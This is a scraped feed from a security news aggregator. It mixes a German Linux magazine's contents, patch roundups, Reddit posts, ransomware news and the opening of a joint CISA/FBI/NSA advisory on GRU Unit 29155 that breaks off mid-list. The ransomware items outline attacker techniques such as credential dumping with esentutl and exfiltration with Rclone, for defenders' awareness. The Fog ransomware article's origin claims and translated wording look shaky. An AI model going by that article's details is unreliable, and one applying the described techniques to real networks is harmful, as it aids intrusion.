<li><strong>Spezialisiertes Surf-Linux.</strong> „Surfsystem“: Diese Distributionen verdienen den Namen wirklich</li>



<li><strong>Virtuelle Linux-Browser.</strong> Varianten externer Browser: Damit surft auch Windows sicher</li>



<li><strong>Sichere Browser.</strong> Firefox gewinnt! Datenschutz-Garant bleibt der TOR-Browser</li>



<li><strong>Browseroptionen.</strong> Sicherheit und Datenschutz: Nutzen Sie die Optionen in Firefox, Chrome, Vivaldi und TOR</li>



<li><strong>VPN für unterwegs.</strong> Was leistet ein VPN und welche Anbieter sind zu empfehlen?</li>



<li><strong>Sichere Heimserver.</strong> Lokale Daten- &amp; Webserver: Auch im LAN gibt es Regeln</li>
</ul>



<h2 class="wp-block-heading">Special II – Tuning für Heimnetze</h2>



<ul class="wp-block-list">
<li><strong>Mehr Tempo im Netzwerk.</strong> Strategien für den Netzturbo: So optimieren Sie den Netzdurchsatz</li>



<li><strong>Datenaustausch im Heimnetz.</strong> Samba, SFTP, HTTP: Nicht immer ist Samba die optimale Lösung</li>



<li><strong>Bittorrent-Downloads.</strong> Bittorrent statt HTTP? Die Technik, Vorteile &amp; Nachteile des Protokolls</li>



<li><strong>Syncthing-Datenabgleich.</strong> Syncthing synchronisiert den Datenbestand lokaler Geräte</li>



<li><strong>Mailverschlüsselung.</strong> Kleopatra &amp; Kmail: So einfach sind abhörsichere Mails für KDE-Nutzer</li>



<li><strong>Geoblocking mit nft.</strong> Netzwerkschutz für Profis: So sperren Sie alle Datenpakete suspekter Herkunft per Landescode</li>
</ul>



<h2 class="wp-block-heading">Software</h2>



<ul class="wp-block-list">
<li><strong>Umsteiger-Linux.</strong> Peppermint-OS „Loaded“ hat viel Standardsoftware an Bord</li>



<li><strong>Audacity: KI und Audio.</strong> Transkribieren und Übersetzen: KI automatisiert die Spracherkennung</li>



<li><strong>Gimp-Oberfläche optimieren.</strong> Gimp-Fenster arrangieren: So wird die Bildbearbeitung zugänglicher</li>



<li><strong>Mathematica auf Raspberry.</strong> Teures Tool kostenlos auf Raspberry: Mathematica hat 1000 Antworten</li>



<li><strong>Neue Software.</strong> 12 neue Versionen: u .a. mit Clementine, Jellyfin, RPI-Imager</li>
</ul>



<h2 class="wp-block-heading">Netzwerk &amp; Hardware</h2>



<ul class="wp-block-list">
<li><strong>Fritzing für „Maker“.</strong> Bau- und Schaltpläne für Platinen-Tüftler: Fritzing visualisiert Projekte und erstellt Listen für Bauteile</li>



<li><strong>Docker-Autostarts.</strong> Für Docker-Instanzen mit Netzwerkaufgaben: So starten Sie Docker-Dienste automatisch</li>



<li><strong>Owntracks-Standortverlauf.</strong> Datenschutz für persönliche Standortaufzeichnungen: Google muss nicht wissen, wo Sie sind</li>



<li><strong>Open Media Vault.</strong> Datenserver für das Homeoffice: So installieren und konfigurieren Sie das NAS-Betriebssystem</li>



<li><strong>Celeste: Cloudbackups.</strong> Grafisches Frontend für Rclone: Celeste sichert auf Dropbox &amp; Co.</li>
</ul>



<h2 class="wp-block-heading">Praxis</h2>



<ul class="wp-block-list">
<li><strong>Linux-Einstellungen sichern.</strong> Pfade, Namen, Kommentare, Formatierung: Diese Tipps führen Sie heraus aus dem Config-Dschungel</li>



<li><strong>Raspberry Pi für Einsteiger.</strong> Platine, Erweiterungen, Systeme: Was Sie vor dem Einstieg in den Kleinstrechner wissen sollten</li>



<li><strong>Terminaltipps.</strong> Tipps &amp; Tools für das Terminal u. a. mit der Navigationshilfe Walk und dem General-Ping mit Fping</li>



<li><strong>Hardwaretipps.</strong> Hardwarelösungen für CPU, Datenträger, Treiber u.a. mit dem Hardwaremonitor Psitop</li>



<li><strong>Softwaretipps.</strong> Neue Tipps und Tools für prominente Linux-Programme wie Digikam und Firefox</li>



<li><strong>Desktoptipps.</strong> Optionen, Erweiterungen &amp; Tipps für die populären Linux-Desktops Gnome, KDE, XFCE &amp; Co.</li>
</ul>



<h2 class="wp-block-heading">Das finden Sie auf der Heft-DVD:</h2>



<ul class="wp-block-list">
<li><strong>Ubuntu Mate 24.10.</strong> Neueste Ubuntu-Version mit Mate-Desktop, Kernel 6.11und aktualisierter Software</li>



<li><strong>Fedora 41 „Security“ Spin.</strong> Fedora-Variante („Spin“) mit einfachem XFCE-Desktop und Fokus auf Sicherheitstests</li>



<li><strong>MX Workbench 23.4.</strong> Live-Zweitsystem mit XFCE-Desktop und umfangreichem Werkzeugkasten für Reparaturen</li>



<li><strong>LinuxWelt Digital XXL 1/25.</strong> (PDF) 363 Seiten technische Grundlagenartikel und Distributionsratgeber LinuxWelt-Jahrgang 2024 (als PDF) Alle sechs Ausgaben der LinuxWelt des Jahres 2024</li>
</ul>



<p>Die <strong>LinuxWelt 1/2025</strong> ist ab sofort am Kiosk für 8,99 Euro erhältlich. Alternativ können Sie das Heft auch über unseren Online-Shop <a href="https://www.idgshop.de/linuxwelt-magazin-hefte-einzel-ausgaben.htm?websale8=idg&amp;ci=8-5275" target="_blank" rel="noreferrer noopener">bestellen</a> und sich bequem nach Hause schicken lassen oder als ePaper herunterladen.</p>



<p>Die LinuxWelt gibt es auch in <a href="https://www.idgshop.de/linuxwelt-magazin-hefte-einzel-ausgaben.htm?websale8=idg&amp;ci=8-5275" target="_blank" rel="noreferrer noopener">digitaler Form</a> für Ihr Android-Gerät, iPad, iPhone, Windows Phone oder Windows 10.</p>



<p>Hier können Sie die <a href="https://www.idgshop.de/linuxwelt-magazin-abo.htm?websale8=idg&amp;ci=2-5275" target="_blank" rel="noreferrer noopener">LinuxWelt abonnieren</a>.</p>



<p><strong>Als Abonnent von</strong> PC-WELT Plus Digital erhalten Sie die <strong>LinuxWelt kostenlos.</strong> Sie erhalten per Mail einen entsprechenden Link zur digitalen Ausgabe. Mehr Informationen hierzu finden Sie in diesem Beitrag: <a href="https://www.pcwelt.de/article/1202590/pc-welt-zieht-um-digitale-ausgaben-nun-bei-emagazines.html">PC-WELT zieht um – Digitale Ausgaben nun bei eMagazines.</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (mpg123 and php8.2), Fedora (libsndfile, mingw-glib2, mingw-libsoup, mingw-python3, and qbittorrent), Oracle (pam:1.5.1 and perl-App-cpanminus), Red Hat (firefox, thunderbird, and webkit2gtk3), Slackware (mozilla), SUSE (firefox, rclone, tomcat, tomcat1...]]></description>
<link>https://tsecurity.de/de/2465736/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2465736/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 27 Nov 2024 15:35:47 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (mpg123 and php8.2), <b>Fedora</b> (libsndfile, mingw-glib2, mingw-libsoup, mingw-python3, and qbittorrent), <b>Oracle</b> (pam:1.5.1 and perl-App-cpanminus), <b>Red Hat</b> (firefox, thunderbird, and webkit2gtk3), <b>Slackware</b> (mozilla), <b>SUSE</b> (firefox, rclone, tomcat, tomcat10, and xen), and <b>Ubuntu</b> (gh, libsoup2.4, libsoup3, pygments, TinyGLTF, and twisted).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (binutils, libsoup, squid:4, tigervnc, and webkit2gtk3), Debian (icinga2, postgresql-13, postgresql-15, smarty3, symfony, thunderbird, and waitress), Fedora (dotnet9.0, ghostscript, microcode_ctl, php-bartlett-PHP-CompatInfo, python-waitress, and web...]]></description>
<link>https://tsecurity.de/de/2448118/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2448118/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 18 Nov 2024 15:06:51 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (binutils, libsoup, squid:4, tigervnc, and webkit2gtk3), <b>Debian</b> (icinga2, postgresql-13, postgresql-15, smarty3, symfony, thunderbird, and waitress), <b>Fedora</b> (dotnet9.0, ghostscript, microcode_ctl, php-bartlett-PHP-CompatInfo, python-waitress, and webkitgtk), <b>Gentoo</b> (Perl, Pillow, and X.Org X server, XWayland), <b>Oracle</b> (binutils, cups-filters, giflib, squid, and webkit2gtk3), <b>Red Hat</b> (webkit2gtk3), <b>SUSE</b> (ansible-core, apache2, gio-branding-upstream, icinga2, kernel-devel, libnghttp2-14, libsoup-2_4-1, libsoup-3_0-0, libvirt, nodejs-electron, postgresql13, postgresql16, python39, rclone, thunderbird, ucode-intel-20241112, and wget), and <b>Ubuntu</b> (python-asyncssh and tomcat9).]]></content:encoded>
</item>
<item>
<title><![CDATA[Moving Back to Windows After 6 Months on Ubuntu]]></title>
<description><![CDATA[About six months ago, I made the switch to Ubuntu, driven by my frustration with Windows’ poor privacy practices and the heavy bloat that seems to keep piling on with every update. Privacy was my biggest reason to switch, and I was hopeful that Linux would offer a smoother, more transparent exper...]]></description>
<link>https://tsecurity.de/de/2412834/linux-tipps/moving-back-to-windows-after-6-months-on-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2412834/linux-tipps/moving-back-to-windows-after-6-months-on-ubuntu/</guid>
<pubDate>Tue, 29 Oct 2024 08:06:00 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>About six months ago, I made the switch to Ubuntu, driven by my frustration with Windows’ poor privacy practices and the heavy bloat that seems to keep piling on with every update. Privacy was my biggest reason to switch, and I was hopeful that Linux would offer a smoother, more transparent experience.</p> <p>And to be fair, Ubuntu has been amazing in many ways. But as much as I value privacy, I’ve hit several practical issues that are hard to ignore:</p> <ol> <li><p>App Compatibility: A lot of commonly used apps just aren’t fully functional on Linux. For instance, with WhatsApp, I’m stuck with the browser version—no voice calls, video calls, or screen sharing. And yes, I prefer Signal, but on Wayland, I can’t even screen share during Signal calls, which forces me to switch to X11 every time I want to share my screen in a Signal call. Proton Drive lacks a native client as well, and while there’s an rclone workaround, trusting third-party code for my data is a concern.</p></li> <li><p>Adobe Suite and Similar Software: I’m fine with using alternatives for Microsoft Office (OnlyOffice has been great) but there’s no real replacement for Adobe’s suite. For anyone doing creative work, this is a big roadblock.</p></li> <li><p>Hardware Compatibility: I have an eGPU, and while hot-plugging works perfectly on Windows, I need to reboot every time I want to connect or disconnect it on Ubuntu. It’s a small thing, but it gets inconvenient over time.</p></li> <li><p>The Hassle of Dual-Booting: I’ve tried dual-booting Windows with Ubuntu, but constantly rebooting to switch OSes just doesn’t feel sustainable.</p></li> </ol> <p>I realize that Linux’s smaller market share limits the development of certain apps, and I wanted to be part of the change. But at this point, the trade-off between privacy and convenience has started affecting my daily workflow more than I’d hoped.</p> <p>This might seem a ridiculous but I'm actually a bit heartbroken, because I love Linux and open source and I hate Windows/Microsoft so much.</p> <p>It seems like I lost the fight against the mega corporation :(</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Prince-of-Privacy"> /u/Prince-of-Privacy </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1geokd0/moving_back_to_windows_after_6_months_on_ubuntu/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1geokd0/moving_back_to_windows_after_6_months_on_ubuntu/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[RaiDrive for Linux]]></title>
<description><![CDATA[RaiDrive is a cloud drive client. I used it years ago on some version of Windows. OpenBoxLab, a Korean company, has been around since 2015, and the only software they seem to have produced is RaiDrive. I must have subscribed to their mailing list at one point because I received a notification yes...]]></description>
<link>https://tsecurity.de/de/2375583/linux-tipps/raidrive-for-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2375583/linux-tipps/raidrive-for-linux/</guid>
<pubDate>Wed, 09 Oct 2024 05:05:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>RaiDrive is a cloud drive client. I used it years ago on some version of Windows. OpenBoxLab, a Korean company, has been around since 2015, and the only software they seem to have produced is RaiDrive.</p> <p>I must have subscribed to their mailing list at one point because I received a notification yesterday that there's now a version for Linux. It's CLI only, and I'm not really keen on using it for anything. I use rclone to back up documents to Google Drive and that's it.</p> <p>The software is available at <a href="http://raidrive.com/">raidrive.com</a>, and you don't have to subscribe to use it without a license. Since I haven't used this version, and I don't intend to use it, I have no opinion on it.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/MostlyNoise"> /u/MostlyNoise </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1fzhuib/raidrive_for_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1fzhuib/raidrive_for_linux/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Groups Abusing Azure Storage Explorer For Stealing Data]]></title>
<description><![CDATA[Ransomware attackers are increasingly exfiltrating data using tools like MEGAsync and Rclone. Shellbags analysis by modePUSH reveals their navigation of directories and file shares to find sensitive data. Despite exfiltrating large amounts of data, attackers prioritize valuable and protected info...]]></description>
<link>https://tsecurity.de/de/2341904/hacking/ransomware-groups-abusing-azure-storage-explorer-for-stealing-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2341904/hacking/ransomware-groups-abusing-azure-storage-explorer-for-stealing-data/</guid>
<pubDate>Thu, 19 Sep 2024 16:04:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ransomware attackers are increasingly exfiltrating data using tools like MEGAsync and Rclone. Shellbags analysis by modePUSH reveals their navigation of directories and file shares to find sensitive data. Despite exfiltrating large amounts of data, attackers prioritize valuable and protected information. The BianLian and Rhysida ransomware groups have been using Azure Storage Explorer to extract data […]</p>
<p>The post <a href="https://gbhackers.com/ransomware-abusing-azure-storage-explorer/">Ransomware Groups Abusing Azure Storage Explorer For Stealing Data</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fog Ransomware Now Targeting the Financial Sector; Adlumin Thwarts Attack]]></title>
<description><![CDATA[Die Fog Ransomware-Gruppe, die dafür bekannt ist, den Bildungs- und Freizeitsektor anzugreifen, hat ihren Wirkungsbereich auf Angriffe auf Finanzdienstleistungsunternehmen ausgeweitet. Dabei nutzten die Angreifer kompromittierte VPN-Anmeldeinformationen, um die Ransomware zu installieren, und gri...]]></description>
<link>https://tsecurity.de/de/2323544/hacking/fog-ransomware-now-targeting-the-financial-sector-adlumin-thwarts-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2323544/hacking/fog-ransomware-now-targeting-the-financial-sector-adlumin-thwarts-attack/</guid>
<pubDate>Mon, 09 Sep 2024 17:50:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="main_content_text"></p><p><font style="vertical-align: inherit;"><font class="" style="vertical-align: inherit;">Die Fog Ransomware-Gruppe, die dafür bekannt ist, den Bildungs- und Freizeitsektor anzugreifen, hat ihren Wirkungsbereich auf Angriffe auf Finanzdienstleistungsunternehmen ausgeweitet. Dabei nutzten die Angreifer kompromittierte VPN-Anmeldeinformationen, um die Ransomware zu installieren, und griffen dabei sowohl Windows- als auch Linux-Endgeräte an. Sie erkannte die Ransomware-Aktivität und isolierte die betroffenen Maschinen, um Datenverschlüsselung und -diebstahl zu verhindern. Während die […]</font></font></p>
<p>Fog Ransomware: Eine neue Bedrohung für den Finanzsektor</p><p>Die Fog Ransomware, eine Variante der STOP/DJVU-Familie, die bisher hauptsächlich Bildungs- und Freizeiteinrichtungen ins Visier nahm, hat nun den lukrativen Finanzsektor entdeckt. Im August 2024 nutzten Angreifer kompromittierte VPN-Zugangsdaten, um einen Ransomware-Angriff auf eine mittelgroße Finanzinstitution zu starten. Die Cyberkriminellen setzten die als "Fog" oder "Lost in the Fog" bekannte Ransomware ein, um sensible Daten auf Endpunkten, die Windows- und Linux-Betriebssysteme ausführen, zu verschlüsseln. Doch dank der innovativen Technologie von Adlumin, die Köderdateien als Sensoren verwendet, um Ransomware-Aktivitäten im Netzwerk zu erkennen, konnte der Angriff abgewehrt werden.</p><p>### Überblick über Fog Ransomware</p><p>Die Fog Ransomware wurde erstmals im Jahr 2021 entdeckt und nutzt Schwachstellen in kompromittierten VPN-Zugangsdaten, um Netzwerkverteidigungen zu durchbrechen. Nach dem Eindringen in ein Netzwerk setzt Fog fortgeschrittene Techniken ein, einschließlich Pass-the-Hash-Angriffen, um Privilegien auf Administratorniveau zu eskalieren und so ihre Wirkung zu verstärken. Fog führt dann eine Reihe von Aktionen durch, die darauf abzielen, die Netzwerksicherheit zu lähmen. Dazu gehören das Deaktivieren von Schutzmechanismen, das Verschlüsseln kritischer Dateien – insbesondere von virtuellen Maschinendisks (VMDKs) – und das Löschen von Backup-Daten, wodurch den Opfern kaum eine andere Wahl bleibt, als das Lösegeld in Betracht zu ziehen. Die verschlüsselten Dateien werden typischerweise mit Erweiterungen wie ".FOG" oder ".FLOCKED" gekennzeichnet und sind von einer Lösegeldforderung begleitet, die die Opfer zu einer Verhandlungsplattform im Tor-Netzwerk leitet.</p><p>### Netzwerkentdeckung und Angriffsverhinderung</p><p>Die Angreifer initiierten die Netzwerkentdeckung, indem sie eine Reihe von Pings an verschiedene Endpunkte sendeten. Sie verwendeten das Tool 'Advanced_Port_Scanner_2.5.3869 (1).exe', um die Netzwerkerkundung durchzuführen, und scannten Hosts im Netzwerk mit erhöhten Privilegien von den kompromittierten Dienstkonten. Das Adlumin-Team stellte fest, dass der Angriff von einer russischen IP-Adresse ausging und verfolgte den Hack bis zu einem ungeschützten Gerät. Durch die Nutzung von Domain-Trust-Beziehungen konnten die Angreifer sich seitlich im Netzwerk bewegen und nutzten zwei kompromittierte Dienstkonten. Die nächste Stufe beinhaltete das Sichern von auf Endpunkten gespeicherten Anmeldeinformationen zahlreicher Benutzer, einschließlich verschlüsselter Google Chrome-Anmeldeinformationen, mit dem Microsoft-Befehlszeilen-Tool "esentutl.exe". Der Bedrohungsakteur synchronisierte und übertrug Daten von infizierten Endpunkten mit 'Rclone', einem effektiven Open-Source-Befehlszeilen-Tool. Das Tool, das zur Verbreitung der Ransomware verwendet wurde, wurde als "locker.exe" identifiziert, was darauf hindeutet, dass es eine Rolle beim "Sperren" oder Verschlüsseln der Daten spielte. Die Lösegeldforderung wurde dann in einer Datei namens "readme.txt" auf jedem kompromittierten Endpunkt veröffentlicht.</p><p>Die Fog Ransomware stellt eine ernsthafte Bedrohung für den Finanzsektor dar, der für seine sensiblen Daten bekannt ist. Sicherheitsspezialisten müssen wachsam bleiben und fortgeschrittene Abwehrmaßnahmen ergreifen, um solche Angriffe zu verhindern und abzuwehren. Die jüngsten Ereignisse zeigen, dass keine Branche vor der Gefahr sicher ist und dass eine kontinuierliche Überwachung und Verbesserung der Sicherheitsprotokolle unerlässlich ist.</p><p></p> ]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian Military Cyber Actors Target US and Global Critical Infrastructure]]></title>
<description><![CDATA[Summary
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are r...]]></description>
<link>https://tsecurity.de/de/2318029/sicherheitsluecken/russian-military-cyber-actors-target-us-and-global-critical-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2318029/sicherheitsluecken/russian-military-cyber-actors-target-us-and-global-critical-infrastructure/</guid>
<pubDate>Thu, 05 Sep 2024 19:07:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive <a href="https://attack.mitre.org/software/S0689/" title="WhisperGate">WhisperGate</a> malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.</p>
<p>To mitigate this malicious cyber activity, organizations should take the following actions today:</p>
<ul>
<li>Prioritize routine system updates and remediate known exploited vulnerabilities.</li>
<li>Segment networks to prevent the spread of malicious activity.</li>
<li>Enable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for webmail, virtual private networks (VPNs), and accounts that access critical systems.</li>
</ul>
<p>This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors<a>—</a>both during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see <strong>Appendix A</strong>) of the WhisperGate malware initially published in the joint advisory, <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-057a" title="Destructive Malware Targeting Organizations in Ukraine">Destructive Malware Targeting Organizations in Ukraine</a>, published February 26, 2022.</p>
<p>FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:</p>
<ul>
<li>U.S. Department of the Treasury</li>
<li>U.S. Department of State (Rewards for Justice)</li>
<li>U.S. Cyber Command Cyber National Mission Force (CNMF)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Czech Military Intelligence (VZ)</li>
<li>Czech Republic Security Information Service (BIS)</li>
<li>German Federal Office for the Protection of the Constitution (BfV)</li>
<li>Estonian Internal Security Service (KAPO)</li>
<li>Latvian State Security Service (VDD)</li>
<li>Security Service of Ukraine (SBU)</li>
<li>Computer Emergency Response Team of Ukraine (CERT-UA)</li>
<li>Canadian Security Intelligence Service (CSIS)</li>
<li>Communications Security Establishment Canada (CSE)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
</ul>
<p>For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the U.S. Department of Justice (DOJ) <a href="https://www.justice.gov/opa/pr/russian-national-charged-conspiring-russia-military-intelligence-destroy-ukrainian" title="Russian National Charged for Conspiring with Russian Military Intelligence to Destroy Ukrainian Government Computer Systems and Data">press release</a>, FBI’s <a href="https://www.fbi.gov/investigate/cyber" title="The Cyber Threat">Cyber Crime</a> webpage, and CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia" title="Russia Cyber Threat Overview and Advisories">Russia Cyber Threat Overview and Advisories</a> webpage.</p>
<p>For a downloadable copy of indicators of compromise (IOCs):</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2024-09/AA24-249A.stix_.xml" class="c-file__link" target="_blank">AA24-249A STIX XML</a>
    <span class="c-file__size">(XML,       321.47 KB
  )</span>
  </div>
</div>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2024-09/AA24-249A-Russian-Military-Cyber-Actors-Target-US-and-Global-Critical-Infrastructure.stix_.json" class="c-file__link" target="_blank">AA24-249A STIX JSON</a>
    <span class="c-file__size">(JSON,       201.39 KB
  )</span>
  </div>
</div>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v15/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 15. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>GRU Unit 29155: Cyber Component</h3>
<p>FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [<a href="https://attack.mitre.org/versions/v15/techniques/T1485/" title="Data Destruction">T1485</a>].</p>
<p>FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations.</p>
<h3>Cybersecurity Industry Tracking</h3>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under <a href="https://attack.mitre.org/groups/G1003" title="Ember Bear">MITRE ATT&amp;CK G1003</a> and commonly used within the cybersecurity community.</p>
<ul>
<li>Cadet Blizzard (formerly known as DEV-0586 by Microsoft)[<a href="https://www.microsoft.com/en-us/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/" title="Destructive malware targeting Ukrainian organizations">1</a>],[<a href="https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/?msockid=2383e2d882c06a751a17f64383d26b64" title="Cadet Blizzard emerges as a novel and distinct Russian threat actor">2</a>]</li>
<li>Ember Bear (also known as Bleeding Bear by CrowdStrike)[<a href="https://www.crowdstrike.com/blog/who-is-ember-bear/" title="Who is EMBER BEAR?">3</a>]</li>
<li>Frozenvista</li>
<li>UNC2589[<a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-invasion-ukraine-retaliation/" title="Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation">4</a>]</li>
<li>UAC-0056[<a href="https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/">5</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government’s understanding for all activity related to these groupings.</p>
<h3>Victimization</h3>
<p>In addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine.</p>
<p>To date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information.</p>
<p>Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries.</p>
<h3>TTP Overview</h3>
<h4><strong>Reconnaissance</strong></h4>
<p>Unit 29155 cyber actors have been observed targeting IP ranges [<a href="https://attack.mitre.org/versions/v15/techniques/T1595/001/" title="Active Scanning: Scanning IP Blocks">T1595.001</a>] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [<a href="https://attack.mitre.org/versions/v15/techniques/T1595/" title="Active Scanning">T1595</a>] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. <strong>Note: </strong>Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</p>
<ul>
<li><strong>Acunetix:</strong> Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [<a href="https://attack.mitre.org/versions/v15/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a>].[<a href="https://www.acunetix.com/support/docs/introduction/" title="Why You Need To Secure Your Web Applications">6</a>]</li>
<li><strong>Amass:</strong> Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites [<a href="https://attack.mitre.org/versions/v15/techniques/T1590/002/" title="Gather Victim Network Information: DNS">T1590.002</a>].[<a href="https://github.com/owasp-amass/amass" title="owasp-amass / amass">7</a>]</li>
<li><strong>Droopescan</strong>[<a href="https://kalilinuxtutorials.com/droopescan/" title="Droopescan : A Plugin-Based Scanner That Aids Security Researchers">8</a>]</li>
<li><strong>JoomScan</strong>[<a href="https://github.com/OWASP/joomscan" title="OWASP / joomscan">9</a>]</li>
<li><strong>MASSCAN:</strong> Unit 29155 cyber actors used MASSCAN and Nmap to discover other machines once inside victim networks.[<a href="https://www.kali.org/tools/masscan/" title="Masscan">10</a>]</li>
<li><strong>Netcat</strong>[<a href="https://www.digitalocean.com/community/tutorials/how-to-use-netcat-to-establish-and-test-tcp-and-udp-connections" title="How To Use Netcat to Establish and Test TCP and UDP Connections">11</a>]</li>
<li><strong>Nmap:</strong> Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the Nmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [<a href="https://attack.mitre.org/versions/v15/techniques/T1046/" title="Network Service Discovery">T1046</a>].</li>
